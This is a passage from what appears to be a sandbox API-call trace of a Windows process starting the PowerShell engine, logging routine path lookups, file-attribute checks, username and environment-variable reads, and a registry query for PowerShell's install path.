	[0529.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.193] SetErrorMode (uMode=0x1) returned 0x1
	[0529.193] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d110 | out: lpFileInformation=0x14d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0529.193] SetErrorMode (uMode=0x1) returned 0x1
	[0529.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.193] SetErrorMode (uMode=0x1) returned 0x1
	[0529.193] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d110 | out: lpFileInformation=0x14d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0529.193] SetErrorMode (uMode=0x1) returned 0x1
	[0529.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.194] SetErrorMode (uMode=0x1) returned 0x1
	[0529.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d110 | out: lpFileInformation=0x14d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0529.194] SetErrorMode (uMode=0x1) returned 0x1
	[0529.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.194] SetErrorMode (uMode=0x1) returned 0x1
	[0529.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d110 | out: lpFileInformation=0x14d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0529.195] SetErrorMode (uMode=0x1) returned 0x1
	[0529.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.197] SetErrorMode (uMode=0x1) returned 0x1
	[0529.197] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0529.198] SetErrorMode (uMode=0x1) returned 0x1
	[0529.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0529.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0529.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0529.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0530.372] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0530.373] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d738 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d738) returned 0x1
	[0530.373] CoTaskMemFree (pv=0x1b974f30) 
	[0530.373] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0530.373] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d778 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d778) returned 1
	[0530.373] CoTaskMemFree (pv=0x1b964a00) 
	[0530.375] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2db77c0*="Available", lpRawData=0x2db7550) returned 1
	[0531.367] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0531.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.367] CoTaskMemFree (pv=0x3ad740) 
	[0531.368] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0531.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.368] CoTaskMemFree (pv=0x3ad740) 
	[0531.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.375] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0531.375] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0531.375] CoTaskMemFree (pv=0x3ad740) 
	[0531.375] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0531.375] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0531.375] CoTaskMemFree (pv=0x3ad740) 
	[0531.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.377] GetCurrentProcessId () returned 0xe18
	[0531.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d758 | out: phkResult=0x14d758*=0x388) returned 0x0
	[0531.382] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d6dc, lpData=0x0, lpcbData=0x14d6d8*=0x0 | out: lpType=0x14d6dc*=0x1, lpData=0x0, lpcbData=0x14d6d8*=0x56) returned 0x0
	[0531.382] CoTaskMemAlloc (cb=0x5a) returned 0x1b959620
	[0531.382] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d6ac, lpData=0x1b959620, lpcbData=0x14d6a8*=0x56 | out: lpType=0x14d6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d6a8*=0x56) returned 0x0
	[0531.382] CoTaskMemFree (pv=0x1b959620) 
	[0531.382] RegCloseKey (hKey=0x388) returned 0x0
	[0531.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.393] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0531.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.393] CoTaskMemFree (pv=0x3ad740) 
	[0531.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
